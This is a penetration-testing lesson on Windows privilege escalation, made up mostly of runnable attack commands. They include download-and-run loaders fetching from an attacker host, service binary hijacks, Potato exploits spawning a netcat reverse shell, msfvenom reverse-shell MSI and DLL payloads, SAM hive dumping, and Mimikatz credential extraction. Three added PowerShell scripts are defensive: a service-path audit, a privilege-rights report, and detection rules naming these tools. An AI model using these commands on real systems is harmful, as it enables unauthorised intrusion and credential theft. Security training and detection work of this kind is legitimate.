Post-Exploitation & Privilege Escalation
Windows Privilege Escalation
Windows privilege escalation requires an understanding of how Windows assigns and enforces privileges: service configuration, token privileges, installer and registry policy, scheduled tasks, and credential storage. This lesson covers the essential techniques for moving from a low-privileged user to SYSTEM or Administrator.
Enumeration Scripts
WinPEAS
# Download and run
certutil -urlcache -split -f http://attacker-ip/winPEASx64.exe winpeas.exe
.\winpeas.exe
# Or from memory (IEX executes PowerShell, so this needs the .ps1 build, not the .bat)
IEX(New-Object Net.WebClient).DownloadString('http://attacker-ip/winPEAS.ps1')
PowerUp
# Import and run
Import-Module .\PowerUp.ps1
Invoke-AllChecks
# From memory
IEX(New-Object Net.WebClient).DownloadString('http://attacker-ip/PowerUp.ps1')
Invoke-AllChecks
Windows Exploit Suggester
# On attacker machine
python windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo sysinfo.txt
Manual Enumeration
System Information
# OS version
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
# Hostname
hostname
# Current user and groups
whoami
whoami /priv
whoami /groups
net user %username%
Users and Groups
# List users
net user
net localgroup
# Administrators
net localgroup administrators
# Domain info
net user /domain
net group /domain
Network Information
ipconfig /all
route print
netstat -ano
arp -a
Privilege Escalation Techniques
1. Service Misconfigurations
Unquoted Service Paths:
# Find auto-start services whose path is unquoted and outside C:\Windows
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
# If the path is: C:\Program Files\My Service\service.exe
# the service control manager tries C:\Program.exe, then C:\Program Files\My.exe, before the real binary.
# A binary placed at one of those locations (if the directory is writable) runs as the service account.
Weak Service Permissions:
# Check service permissions
accesschk64.exe -uwcqv "Everyone" *
accesschk64.exe -uwcqv "Authenticated Users" *
# If writable, replace service binary
sc qc vulnerable_service
sc config vulnerable_service binpath= "C:\temp\shell.exe"
sc stop vulnerable_service
sc start vulnerable_service
Writable Service Binary:
# Check permissions on service executable
icacls "C:\path\to\service.exe"
# If writable, replace with malicious binary
move "C:\path\to\service.exe" "C:\path\to\service.exe.bak"
copy C:\temp\shell.exe "C:\path\to\service.exe"
sc stop service_name
sc start service_name
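The following PowerShell script is an added example, not part of this lesson or of any tool it names. It audits every service for an unquoted path containing spaces, reports whether a low-privileged principal could write to any of the locations the service control manager would try first, and, with the -Fix switch (a parameter defined here, not a Windows option), re-quotes the ImagePath in the registry. It assumes it runs in an elevated PowerShell session on the host being audited.

```powershell
# Added example (not from the original lesson): audit unquoted service paths
# and report which ones a low-privileged user could hijack. Run elevated.
# -Fix is a switch defined in this script; it re-quotes ImagePath in the registry.
param([switch]$Fix)

# Principals that should never be able to create files inside a service's search path.
$LowPriv = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

function Test-LowPrivWritable {
    param([string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir)) { return $false }
    foreach ($ace in (Get-Acl -LiteralPath $Dir).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPriv -notcontains $ace.IdentityReference.Value) { continue }
        # CreateFiles/WriteData is the right needed to drop a new file here.
        # Generic rights show up as raw integers and are not matched by this check.
        if ("$($ace.FileSystemRights)" -match 'FullControl|Modify|Write|CreateFiles') { return $true }
    }
    return $false
}

foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $path = $svc.PathName
    if ([string]::IsNullOrWhiteSpace($path) -or $path.TrimStart().StartsWith('"')) { continue }
    # The executable is everything up to the first ".exe"; the remainder is arguments.
    if ($path -notmatch '^(?<exe>.+?\.exe)(?<args>.*)$') { continue }
    $exe  = $Matches.exe
    $rest = $Matches.args
    if ($exe -notmatch ' ') { continue }   # no space, no ambiguity

    # Every space in the executable path yields a candidate that CreateProcess
    # tries before the real binary, e.g. C:\Program.exe and
    # "C:\Program Files\My.exe" for "C:\Program Files\My Service\service.exe".
    $candidates = @()
    $idx = $exe.IndexOf(' ')
    while ($idx -gt 0) {
        $candidates += ($exe.Substring(0, $idx) + '.exe')
        $idx = $exe.IndexOf(' ', $idx + 1)
    }
    $exposed = $candidates | Where-Object { Test-LowPrivWritable (Split-Path -Parent $_) }

    [pscustomobject]@{
        Service   = $svc.Name
        RunsAs    = $svc.StartName
        StartMode = $svc.StartMode
        Path      = $path
        Exposed   = ($exposed -join '; ')   # empty means unquoted but not currently writable
    }

    if ($Fix) {
        # Quote the executable portion only; the existing REG_EXPAND_SZ type is preserved.
        Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)" `
                         -Name ImagePath -Value ('"' + $exe + '"' + $rest)
    }
}
```

Run it once without -Fix to review the Exposed column; an unquoted path with no writable candidate directory is still worth quoting, because directory ACLs change as software is installed. The fix takes effect at the next service start.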
2. Token Privileges
Check current privileges:
whoami /priv
SeImpersonatePrivilege (Potato Attacks):
# Using JuicyPotato (Windows Server 2016/2019)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\shell.exe" -t *
# Using PrintSpoofer (Windows 10/Server 2019)
PrintSpoofer.exe -i -c cmd
# Using GodPotato (Universal)
GodPotato.exe -cmd "nc.exe -e cmd.exe attacker-ip 4444"
SeBackupPrivilege:
# Copy SAM and SYSTEM
reg save hklm\sam C:\temp\sam
reg save hklm\system C:\temp\system
# Extract hashes offline with secretsdump
impacket-secretsdump -sam sam -system system LOCAL
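To see which accounts hold the rights this section singles out before an attacker does, the local security policy can be exported with secedit and its [Privilege Rights] section parsed. The script below is an added example, not part of the lesson or of secedit itself: the sample export embedded in it is constructed so the parser can be tried offline, and -CfgPath is a parameter defined here for pointing it at a real export (secedit /export /cfg C:\temp\secpol.cfg).

```powershell
# Added example (not from the original lesson): report which principals hold
# user rights that enable privilege escalation, from a secedit policy export.
param([string]$CfgPath)

# Rights whose holders should be reviewed.
$Watch = @('SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege',
           'SeBackupPrivilege', 'SeRestorePrivilege', 'SeDebugPrivilege',
           'SeLoadDriverPrivilege', 'SeTakeOwnershipPrivilege')

# Holders that are expected by default: Administrators, LOCAL SERVICE,
# NETWORK SERVICE, SERVICE and SYSTEM.
$Builtin = @('*S-1-5-32-544', '*S-1-5-19', '*S-1-5-20', '*S-1-5-6', '*S-1-5-18')

if ($CfgPath) {
    # secedit writes UTF-16, hence -Encoding Unicode.
    $lines = Get-Content -LiteralPath $CfgPath -Encoding Unicode
} else {
    # Constructed sample in the shape of a real [Privilege Rights] section.
    $lines = @'
[Privilege Rights]
SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-19,*S-1-5-20,*S-1-5-6,svc_web
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551,backupsvc
SeDebugPrivilege = *S-1-5-32-544
SeShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-545
'@ -split "`r?`n"
}

function Resolve-Principal {
    param([string]$Token)
    # secedit prefixes SIDs with "*"; plain names are written as-is.
    if (-not $Token.StartsWith('*')) { return $Token }
    try {
        $sid = New-Object System.Security.Principal.SecurityIdentifier($Token.TrimStart('*'))
        return $sid.Translate([System.Security.Principal.NTAccount]).Value
    } catch {
        return $Token   # unresolvable (orphaned or foreign SID): keep the raw value
    }
}

$inSection = $false
foreach ($line in $lines) {
    if ($line -match '^\[(.+)\]') { $inSection = ($Matches[1] -eq 'Privilege Rights'); continue }
    if (-not $inSection -or $line -notmatch '^(\w+)\s*=\s*(.*)$') { continue }
    $right, $holders = $Matches[1], $Matches[2]
    if ($Watch -notcontains $right) { continue }
    foreach ($h in ($holders -split ',' | ForEach-Object Trim)) {
        [pscustomobject]@{
            Right  = $right
            Holder = Resolve-Principal $h
            Review = ($Builtin -notcontains $h)   # anything beyond the defaults needs a reason
        }
    }
}
```

With the embedded sample, svc_web shows up under SeImpersonatePrivilege and backupsvc and Backup Operators under SeBackupPrivilege with Review set to True; Backup Operators holding that right is a Windows default, so the column means "justify", not "remove".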
3. AlwaysInstallElevated
# Check registry
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If both keys exist and return 0x1 (REG_DWORD), any user can install an MSI as SYSTEM
msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker-ip LPORT=4444 -f msi -o shell.msi
# Install MSI
msiexec /quiet /qn /i shell.msi
4. Scheduled Tasks
# List scheduled tasks
schtasks /query /fo LIST /v
# Check writable task scripts
icacls "C:\path\to\scheduled\script.bat"
# If writable, modify to include reverse shell
5. DLL Hijacking
# Find missing DLLs
# Use Process Monitor to identify DLL search order
# Create malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker-ip LPORT=4444 -f dll -o malicious.dll
# Place in DLL search path
6. AutoRuns
# Check AutoRun executables
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# Check permissions on AutoRun binaries
icacls "C:\path\to\autorun.exe"
7. Stored Credentials
# Saved credentials
cmdkey /list
# If credentials found, use runas
runas /savecred /user:DOMAIN\Administrator "cmd.exe /c whoami > C:\temp\output.txt"
# Search for passwords in files
findstr /si password *.txt *.ini *.config *.xml
# Common locations
type C:\Windows\Panther\Unattend.xml
type C:\Windows\System32\sysprep\sysprep.xml
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
8. Kernel Exploits
# Check Windows version
systeminfo
# Notable exploits:
# MS16-032 (Windows 7/8/10, Server 2008/2012)
# MS15-051 (Windows 7, Server 2008)
# PrintNightmare (CVE-2021-34527)
Password Extraction
SAM Database
# From elevated CMD
reg save hklm\sam C:\temp\sam
reg save hklm\system C:\temp\system
# Transfer and extract with Impacket
impacket-secretsdump -sam sam -system system LOCAL
Mimikatz
# Run with admin privileges
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
PrivEsc Methodology
1. Run WinPEAS/PowerUp
2. Check whoami /priv for token privileges
3. Look for unquoted service paths
4. Check service permissions
5. Look for AlwaysInstallElevated
6. Check scheduled tasks
7. Look for stored credentials
8. Check AutoRuns permissions
9. Search for sensitive files
10. Check kernel version for exploits
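Each step of this methodology leaves process-creation telemetry, and a defender can map the commands this lesson uses to detection rules. The script below is an added example, not part of the lesson: the rules are my own, the event samples are constructed to mirror commands shown above, and -Live is a switch defined here that instead reads Security 4688 events (which carry the command line only when command-line auditing is enabled, and a parent process name on Windows 10/Server 2016 and later).

```powershell
# Added example (not from the original lesson): simple process-creation rules
# for the privilege escalation commands this lesson shows.
param([switch]$Live)

# Name-based rules such as the Potato one are easily defeated by renaming a
# binary; the command-syntax rules are the durable ones.
$Rules = @(
    @{ Name = 'Service binPath change';      Pattern = '\bsc(\.exe)?"?\s+config\b.*\bbinpath=' },
    @{ Name = 'SAM/SYSTEM hive export';      Pattern = '\breg(\.exe)?"?\s+save\s+hklm\\(sam|system)\b' },
    @{ Name = 'Quiet MSI install';           Pattern = '\bmsiexec(\.exe)?\b.*(/quiet|/qn).*\.msi' },
    @{ Name = 'runas with saved credential'; Pattern = '\brunas(\.exe)?\b.*/savecred' },
    @{ Name = 'Privilege enumeration';       Pattern = '\bwhoami(\.exe)?"?\s+/(priv|all)\b' },
    @{ Name = 'Potato-style tool name';      Pattern = '(Juicy|God)Potato|PrintSpoofer' },
    @{ Name = 'Mimikatz module syntax';      Pattern = 'sekurlsa::|privilege::debug' }
)

# Constructed sample events (User, Parent, CommandLine); not real telemetry.
$Events = @(
    @{ User = 'CORP\jdoe';             Parent = 'C:\Windows\explorer.exe';           CommandLine = '"C:\Windows\System32\whoami.exe" /priv' },
    @{ User = 'CORP\jdoe';             Parent = 'C:\Windows\System32\cmd.exe';       CommandLine = 'sc config vulnerable_service binpath= "C:\temp\shell.exe"' },
    @{ User = 'NT AUTHORITY\SYSTEM';   Parent = 'C:\Windows\System32\services.exe';  CommandLine = 'C:\Windows\System32\svchost.exe -k netsvcs' },
    @{ User = 'CORP\jdoe';             Parent = 'C:\Windows\System32\cmd.exe';       CommandLine = 'reg save hklm\sam C:\temp\sam' },
    @{ User = 'CORP\backup';           Parent = 'C:\Windows\System32\cmd.exe';       CommandLine = 'msiexec /quiet /qn /i C:\Users\backup\AppData\Local\Temp\shell.msi' },
    @{ User = 'CORP\jdoe';             Parent = 'C:\Windows\explorer.exe';           CommandLine = '"C:\Program Files\Vendor\app.exe" --config app.ini' }
)

function Get-EventField {
    param($Data, [string]$Name)
    ($Data | Where-Object { $_.Name -eq $Name }).'#text'
}

if ($Live) {
    $Events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents 500 |
        ForEach-Object {
            $d = ([xml]$_.ToXml()).Event.EventData.Data
            @{
                User        = "$(Get-EventField $d 'SubjectDomainName')\$(Get-EventField $d 'SubjectUserName')"
                Parent      = Get-EventField $d 'ParentProcessName'
                CommandLine = Get-EventField $d 'CommandLine'
            }
        }
}

function Invoke-PrivEscRules {
    param([object[]]$Events)
    foreach ($e in $Events) {
        foreach ($r in $Rules) {
            if ($e.CommandLine -match $r.Pattern) {
                [pscustomobject]@{ Rule = $r.Name; User = $e.User; Parent = $e.Parent; CommandLine = $e.CommandLine }
            }
        }
    }
}

Invoke-PrivEscRules $Events | Format-Table -AutoSize
```

On the constructed sample the whoami, sc config, reg save and msiexec lines each produce one hit and the two benign lines produce none. The rules match on -match, so they are case-insensitive, and the Parent column is what separates an interactive cmd.exe child from a legitimate installer or backup job.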
Quick Reference
# Basic enum
systeminfo
whoami /all
net user
net localgroup administrators
# Services
sc query
wmic service get name,pathname
# Token privileges
whoami /priv
# Scheduled tasks
schtasks /query /fo LIST /v
# Registry AutoRuns
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# Saved creds
cmdkey /list
Next, we'll cover post-exploitation techniques and persistence.